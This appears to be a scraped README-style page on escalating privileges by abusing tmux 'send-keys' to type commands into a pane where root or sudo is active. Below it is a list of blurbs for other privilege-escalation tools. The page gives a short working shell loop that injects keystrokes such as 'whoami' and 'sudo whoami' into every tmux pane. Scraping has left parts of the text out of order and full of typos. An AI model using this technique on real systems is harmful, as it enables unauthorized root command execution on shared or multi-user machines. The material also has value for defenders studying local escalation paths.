tmux Privilege Escalation
tmux privilege escalation abusing send-keys
A script run as user in tmux can under some circumstances execute commands as root.
Did you know you can send keystrokes to other panes in tmux?
You can abuse send-keys to send commands to a root/sudo pane.
That's all there is to it, that's the trick.
There's a tmux feature to send keystrokes to a pane.
tmux send-keys -t $pane 'C-c'
for example sends SIGINT to whatever is running in pane $pane.
When I sae the send-keys feature, I was like:
"What if theres another pane, where the user is logged in as root?"
tmux tmux sp su # login as root
Now go back to the other tmux pane (where you are logged in as user).
Now run the following script, to execute
in every pane:
#!/bin/sh for pane in `tmux list-panes | grep -Po '^\d'`; do tmux send-keys -t $pane 'C-c' tmux send-keys -t $pane 'whoami '; done;
You will see, as expected, the command
With the same trick you can abuse that
was used in another pane.
tmux send-keys -t $pane 'sudo whoami ';
. . /
README.md Sudohulk This tool change sudo command, hooking the execve syscall using ptrace, tested under bash and zsh supported architectures: x86_64 x86
README.md BeRoot Project BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege. It has been added to the
README.md Active Directory Assessment and Privilege Escalation Script
tl;dr gVisor is Google’s sandboxing technology for containers running less-than-fully-trusted code. It’s a Golang reimplementation of the Linux kernel that runs in usersp...
README.md dirty_sock: Privilege Escalation in Ubuntu (via snapd) In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local...
README.md uptux Privilege escalation checks for Linux systemd. This tool checks for issues on Linux systems that may lead to privilege escalatio...
With Microsoft continuously improving kernel mitigations and raising the bar for exploiting native kernel components, third-party kernel drivers are becoming a more appealing target for attackers and an important area of...
README.md [Linux] Privilege Escalation by injecting process possessing sudo tokens Inject process that have valid sudo token and activate our own sudo...